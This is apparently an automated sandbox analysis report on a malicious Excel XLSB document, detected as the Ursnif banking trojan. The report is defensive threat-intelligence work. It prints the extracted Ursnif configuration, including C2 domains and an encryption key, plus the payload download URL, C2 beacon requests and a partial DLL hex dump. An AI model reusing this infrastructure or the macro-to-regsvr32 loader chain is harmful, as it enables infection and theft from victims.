Analysis Report 6613n246zm543w.xlsb

Overview

General Information

Sample Name: 6613n246zm543w.xlsb
Analysis ID: 403127
MD5: f5ac70a6e136e274a8856f244c9183b7
SHA1: 3991a3a8ec56ee8487ff17e226c49f2355b9d3ac
SHA256: 1f7a0472872d38133ce9fef933631d5110cf076ec44f344a95bd683e73fdbdc9
Tags: xlsb
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for dropped file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Ursnif
Yara detected Ursnif
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Office process drops PE file
Writes or reads registry keys via WMI
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the installation date of Windows
Registers a DLL
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

barindex
Found malware configuration
Source: 1.2.regsvr32.exe.48494a0.2.raw.unpack Malware Configuration Extractor: Ursnif {"RSA Public Key": "8oKmD0Ib40VYxHRgT7OnHwlxmK3U2F2Fl3GpR9KrKxvSCrIeiCLZWlQ2QCt+AnP+N5tCnTTv45/b0/D8Eb4xqxiXBnUy/ADWorQScIoNIPfBQqutzO+Ozy/mev4m2eZAuMivS2UNJVH4DVsYsAkGAC4GR+aszytDfGSZp3MklfgRJ6Noj034BrS4tQl5qmeWhJa+Of/CLdmkCwJurSEhMKu3NK7g4EVzni8lIJrDkWNCTaVL4CWXewbAOJFPwh8Y/20KkHTZmVKLmJJRcSj8yyH0avZDtWvJHRDxiI+JYUar2ia3phWwtqVzVhzYzz8aoUVzmlt840TF55o2e8TRUCEZNNmvmluqgNZzQuNIj68=", "c2_domain": ["app.buboleinov.com", "chat.veminiare.com", "chat.billionady.com", "app3.maintorna.com"], "botnet": "1500", "server": "580", "serpent_key": "ZQktwkM8O9lYn9oX", "sleep_time": "10", "SetWaitableTimer_value": "10"}
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\block.dll ReversingLabs: Detection: 12%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dll ReversingLabs: Detection: 12%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: Binary string: c:\Whether\class\156\Through\How.pdb source: block.dll.0.dr

Software Vulnerabilities:

barindex
Document exploit detected (creates forbidden files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dll Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\Public\block.dll Jump to behavior
Document exploit detected (drops PE files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: presentation[1].dll.0.dr Jump to dropped file
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Section loaded: unknown origin: URLDownloadToFileA Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe

Networking:

barindex
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 May 2021 17:48:15 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Mon, 03 May 2021 13:17:32 GMTAccept-Ranges: bytesContent-Length: 312832Cache-Control: max-age=10800Expires: Mon, 03 May 2021 20:48:15 GMThost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2Keep-Alive: timeout=5, max=75Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 98 d4 f0 e2 dc b5 9e b1 dc b5 9e b1 dc b5 9e b1 c2 e7 0b b1 cc b5 9e b1 c2 e7 1d b1 81 b5 9e b1 d5 cd 0d b1 d9 b5 9e b1 dc b5 9f b1 b4 b5 9e b1 c2 e7 1a b1 c3 b5 9e b1 c2 e7 0c b1 dd b5 9e b1 c2 e7 0a b1 dd b5 9e b1 c2 e7 0f b1 dd b5 9e b1 52 69 63 68 dc b5 9e b1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 df 48 6e 60 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 90 04 00 00 94 10 00 00 00 00 00 d2 3b 03 00 00 10 00 00 00 a0 04 00 00 00 00 01 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 15 00 00 04 00 00 aa f9 04 00 02 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 9f 04 00 54 00 00 00 9c 95 04 00 3c 00 00 00 00 20 15 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 15 00 d0 10 00 00 f0 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 9e 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 8f 04 00 00 10 00 00 00 90 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 71 10 00 00 a0 04 00 00 10 00 00 00 94 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 03 00 00 00 20 15 00 00 04 00 00 00 a4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 08 1d 00 00 00 30 15 00 00 1e 00 00 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: GET /presentation.dll HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: docs.atu.ngr.mybluehost.meConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /z641zbWI8F5NGo_/2BArU_2BbQAq9y6CQ2/iYglxzTUG/6THXjDZRni2_2BHtJ8xS/hQVd4Naf0x6FbAwTSzE/j2W2tGJ3BJZvVbX11_2BUV/fpUC_2B6Q9mfu/3o2_2B46/OLYUaNQoAWvs_2FbvG_2BKH/7iWhqlNtvD/J2yWSfQ76dcAKMFuZ/3mJsX_2Bs0FH/qiS1vq47Ihl/qYjn0Yg7_2Fs22/uUYx5ZbSNGvuUqs3cskdX/qwpRyPlhL_2FkPNb/1rre5N02_2FaPz2/bBs8grMdfh07gYK5nT/9gtPy0LuP/wYiN2jeiY_2BAyR8pqAH/pP4fdKjSstJgODzp7LO/GGc_2F8syE1Y/XZR_2F6_2/Fm HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: app.buboleinov.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /pGAWsdPZsgmlp8IeD/HimMWYQD3vgj/nWrp3CJhfHJ/OCZulU9DF2vABL/EGqK7P_2BoREnVKXUKrMq/O25bJi9K6cy2wBFt/EYfe_2FKkVGOswo/zrljXUlqaCddZUQdMz/46rOG0TD7/jSwGOmqtlI1lhZnMTkpj/OVdYkB6bCvlTi8j76Hq/ls7qgwy0MLToWsmBH4qSen/tk209OxMyhspY/JW_2B_2B/JDgZlFf6GkmqLMRn5B4cp37/KRW8p6Kt3j/I1_2FzkkwDlUgXN_2/B8sJnr99OISw/18ko4KjrRQ1/26TtcKYNzHhDSL/9AqfJNAejPb1kyuCVpyID/xExOyq0w/s HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: chat.billionady.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /F8d0aGGV7/IFlLstzk2tyypfn_2Fmm/U_2BnTF3_2BdKngQdqp/axZO_2FFau1L_2Bp8DkKab/4wB0QgN10EkpX/AcOnUpOy/sx6xA_2BQgCwb8YrqbLddxV/OJDcwH612j/SgvuMvjnhyj_2BJZu/QEAjCzH7iakZ/oq21_2FJOeJ/SwjqqZOEiD8hxw/G5RB86oNRHPQeS1WmQofx/9xSmKamg1DMw2k9J/4izLK3dr4GQOE25/kgxEQPFLWO2XCIrGa5/PGMRBxlzM/0Ejxm5VgBpRdVV0sXhjU/M_2BEEG31ubNw2v0Fmu/Lkyp4hip_2Fjy_2FVx4B63/WkF_2BbbsvI0l/DMReAFgM/oHuJg HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: app3.maintorna.comConnection: Keep-Alive
Source: msapplication.xml0.18.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xbb2191a6,0x01d74044</date><accdate>0xbb2191a6,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.18.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xbb2191a6,0x01d74044</date><accdate>0xbb2191a6,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.18.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xbb28b8a6,0x01d74044</date><accdate>0xbb28b8a6,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.18.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xbb28b8a6,0x01d74044</date><accdate>0xbb2d7d58,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.18.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xbb2d7d58,0x01d74044</date><accdate>0xbb2d7d58,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.18.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xbb2d7d58,0x01d74044</date><accdate>0xbb2d7d58,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: docs.atu.ngr.mybluehost.me
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 03 May 2021 17:49:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: {E4D8D280-AC37-11EB-90EB-ECF4BBEA1588}.dat.18.dr, ~DFEF08F5C4CE8758CE.TMP.18.dr String found in binary or memory: http://app.buboleinov.com/z641zbWI8F5NGo_/2BArU_2BbQAq9y6CQ2/iYglxzTUG/6THXjDZRni2_2BHtJ8xS/hQVd4Naf
Source: {0D9072B2-AC38-11EB-90EB-ECF4BBEA1588}.dat.27.dr, ~DFC4112F6E645ECEC7.TMP.27.dr String found in binary or memory: http://app3.maintorna.com/F8d0aGGV7/IFlLstzk2tyypfn_2Fmm/U_2BnTF3_2BdKngQdqp/axZO_2FFau1L_2Bp8DkKab/
Source: {FF57CED8-AC37-11EB-90EB-ECF4BBEA1588}.dat.24.dr, ~DFE7296AD5C85F4BE9.TMP.24.dr String found in binary or memory: http://chat.billionady.com/pGAWsdPZsgmlp8IeD/HimMWYQD3vgj/nWrp3CJhfHJ/OCZulU9DF2vABL/EGqK7P_2BoREnVK
Source: sharedStrings.bin String found in binary or memory: http://docs.atu.ngr.mybluehost.me/presentation.dll
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: msapplication.xml.18.dr String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.18.dr String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.18.dr String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.18.dr String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.18.dr String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.18.dr String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.18.dr String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.18.dr String found in binary or memory: http://www.youtube.com/
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://api.aadrm.com/
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://api.cortana.ai
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://api.office.net
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://api.onedrive.com
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://augloop.office.com
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://cdn.entity.
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://clients.config.office.net/
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://config.edge.skype.com
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://cortana.ai
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://cortana.ai/api
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://cr.office.com
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://dev.cortana.ai
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://devnull.onenote.com
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://directory.services.
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://graph.windows.net
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://graph.windows.net/
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://lifecycle.office.com
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://login.windows.local
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://management.azure.com
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://management.azure.com/
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://messaging.office.com/
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://ncus.contentsync.
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://ncus.pagecontentsync.
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://officeapps.live.com
